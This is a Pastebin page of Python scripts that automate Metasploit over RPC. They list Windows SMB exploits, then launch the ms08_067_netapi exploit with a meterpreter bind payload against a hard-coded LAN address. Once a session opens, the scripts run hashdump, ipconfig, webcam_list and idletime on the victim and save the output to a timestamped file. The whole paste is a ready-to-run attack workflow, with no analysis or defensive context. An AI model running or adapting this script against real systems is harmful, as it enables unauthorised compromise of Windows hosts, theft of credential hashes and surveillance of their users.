Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from metasploit.msfrpc import MsfRpcClient
- cli = MsfRpcClient(username="demo", password="demo",server="192.168.8.59",port=55553,ssl=False)
- lista = cli.modules.exploits
- for m in lista:
- if "windows" in m:
- if "smb" in m:
- print m
- from metasploit.msfrpc import MsfRpcClient
- #import time
- #msfrpcd -U msf -P test -f
- cli = MsfRpcClient(username="msf", password="test")
- lista = cli.modules.exploits
- exploit = cli.modules.use('exploit', 'windows/smb/ms08_067_netapi')
- print exploit.description
- print exploit.required
- from metasploit.msfrpc import MsfRpcClient
- import time
- def save(contenido):
- narchivo = ("resultado-" + time.strftime("%Y-%m-%d_%H:%M") +
- ".txt")
- file = open(narchivo, "w")
- file.write(contenido)
- print "Resultado guardado en " + narchivo
- #msfrpcd -U msf -P test -f
- ip_remota = '192.168.1.208'
- cli = MsfRpcClient(username="msf", password="test")
- lista = cli.modules.exploits
- exploit = cli.modules.use('exploit', 'windows/smb/ms08_067_netapi')
- exploit['RHOST'] = ip_remota
- exploit.execute(payload='windows/meterpreter/bind_tcp')
- #print cli.sessions.list
- if not cli.sessions.list:
- print 'no hay sesiones activas aun'
- else:
- print cli.sessions
- shell = cli.sessions.session(1)
- shell.write("hashdump")
- buff = shell.read()
- shell.write("ipconfig")
- buff += shell.read()
- shell.write("webcam_list")
- buff += shell.read()
- shell.write("idletime")
- buff += shell.read()
- print buff
- save(buff)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement